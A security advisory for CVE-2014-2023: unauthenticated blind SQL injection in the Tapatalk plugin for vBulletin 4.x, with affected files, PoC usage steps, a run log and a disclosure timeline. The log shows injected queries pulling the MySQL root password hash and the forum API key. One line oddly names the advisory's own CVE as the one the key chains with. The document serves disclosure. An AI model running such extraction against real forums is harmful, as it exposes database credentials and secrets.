
Preliminary VulnNote

CVE-2014-2023 - Tapatalk for vBulletin 4.x - multiple blind SQL injections (pre-auth)

Overview

date    :  10/12/2014   
cvss    :  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base  
cwe     :  89   

vendor  :  Tapatalk Inc  
product :  Tapatalk for vBulletin 4.x   
versions affected :  <= 5.2.1 (5.2.1 is the latest release to date)
                     5.2.1  (verified)
                     4.9.0  (verified)
					
exploitability :
			* remotely exploitable
			* NO authentication required
			* NO user interaction required
			* NO special configuration required (default settings)

Abstract

Tapatalk for vBulletin 4.x does not sanitize the parameters of the XML-RPC
calls unsubscribe_topic and unsubscribe_forum, allowing unauthenticated remote
users to inject arbitrary SQL into the plugin's database queries. The result is
not returned in the response, so extraction has to go through a blind
(boolean) oracle, as the PoC below does.

googledork: see PoC code

Details

vulnerable components:
	./mobiquo/functions/unsubscribe_forum.php
	./mobiquo/functions/unsubscribe_topic.php
The XML-RPC request is decoded and the decoded, attacker-provided parameter
values are used directly in an SQL query, without escaping or type checks.

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023


1) prerequisites
     vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
	 edit the PoC to match your TARGET (optionally set DEBUG=True)
	 (optionally) edit the query to extract specific database values
	 Note: the PoC first tries to detect Tapatalk on that host
	 run the PoC
	
by default it extracts
* the mysql root password hash (only works if the vBulletin db user is allowed to read mysql.user)
* vBulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

extraction is limited only by the access permissions of the vBulletin db_user


run:
[ i] Taptalk detected ...  'http://TARGET/mobiquo/mobiquo.php' ...  v.5.2.1  :) - OK
[   ] TAPATALK for vBulletin 4.x - SQLi
[--] Target: http://TARGET/forum.php
[ +] Attack - sqli
[ *] guess mysql user/pass
[    ] trying to guess length ...
. 
[  *] LENGTH = 0
[    ] trying to guess value  ...
[  *] SUCCESS!: query: select -1 from mysql.user where user='root' and password =''

[ *] guess apikey
[    ] trying to guess length ...
. . . . . . . . . 
[  *] LENGTH = 8
[    ] trying to guess value  ...
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - [4]..
. . . . . . 
[  +] HIT! - 4[F]..
. 
[  +] HIT! - 4F[A]..
. . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FA[V]..
. . . 
[  +] HIT! - 4FAV[c]..
. . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FAVc[R]..
. . . . 
[  +] HIT! - 4FAVcR[D]..
. . . 
[  +] HIT! - 4FAVcRD[c]..
[  *] SUCCESS!: query: select -1 from setting where varname='apikey' and value ='4FAVcRDc'
4FAVcRDc
-- done --

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
2014-10-14: vendor response - acknowledged, fix in progress
2014-10-17: waiting for fix to become publicly available
2014-10-24: poc release

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

(0x721427D8)